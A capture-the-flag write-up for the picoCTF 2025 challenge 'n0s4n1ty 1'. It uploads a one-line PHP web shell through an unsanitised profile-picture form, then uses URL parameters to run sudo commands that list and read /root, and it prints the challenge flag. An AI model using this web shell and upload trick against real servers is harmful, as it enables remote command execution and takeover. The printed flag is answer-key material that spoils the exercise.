picoCTF Web Exploitation Guide

here's how to solve n0s4n1ty 1

Back to the Web Exploitation Guides

n0s4n1ty 1

Name: n0s4n1ty 1
Description: A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory. You can access the web application here!
Author: Prince Niyonshuti N.
Tags: Easy, Web Exploitation, picoCTF 2025, browser_webshell_solvable
Challenge from: picoCTF 2025
Hints:
1. File upload was not sanitized
2. Whenever you get a shell on a remote machine, check sudo -l

Theory

According to the description, to get the flag we have to somehow gain the ability to enter commands so that we can use sudo to get inside the root directory and get the flag from there. So we have to find a way to run commands, and we've got a profile picture upload, so we'll probably have to upload a php, I don't know how much security this has, but we'll find a way to upload a php file and run commands from there from a parameter because it's a fast way to do it. So if it doesn't have much security we'll try this and if it doesn't work we'll change some stuff later, but this is a really simple php code. First it's gonna grab the parameter run from the link, so like file.php?run=something and it'll grab that something and execute it like a shell command, it's that easy:

<?php
echo system($_GET['run']);
?>

Solution

So we'll open the website and enter the file with the php code we just did:

The file nuh-sanitie.php has been uploaded Path: uploads/nuh-sanitie.php

Okay! And it actually worked, I guess because the level is called no sanity, that it doesn't really sanitize input and makes possible the upload of weird files like the one we just uploaded. So now we're gonna go to the file link they gave us and put it what we want to execute with sudo on the url. So first we'll execute what the second hint said, so sudo -l:

?run=sudo -l

That doesn't seem to give us anything, so let's just continue with what the description says and look through the root directory:

?run=sudo ls -la /root

It's a little unreadable because the spaces and new lines are all messed up because of HTML, so let's go into Ctrl+U to see view source so that it loads like it should:

Much better, now let's use cat to print the contents of the flag file:

?run=sudo cat /root/flag

And the flag is:

picoCTF{wh47_c4n_u_d0_wPHP_4043cda3}

There we go! That's the flag.

I rated this level as "good"! :3

https://play.picoctf.org/practice/challenge/482

Explore My Website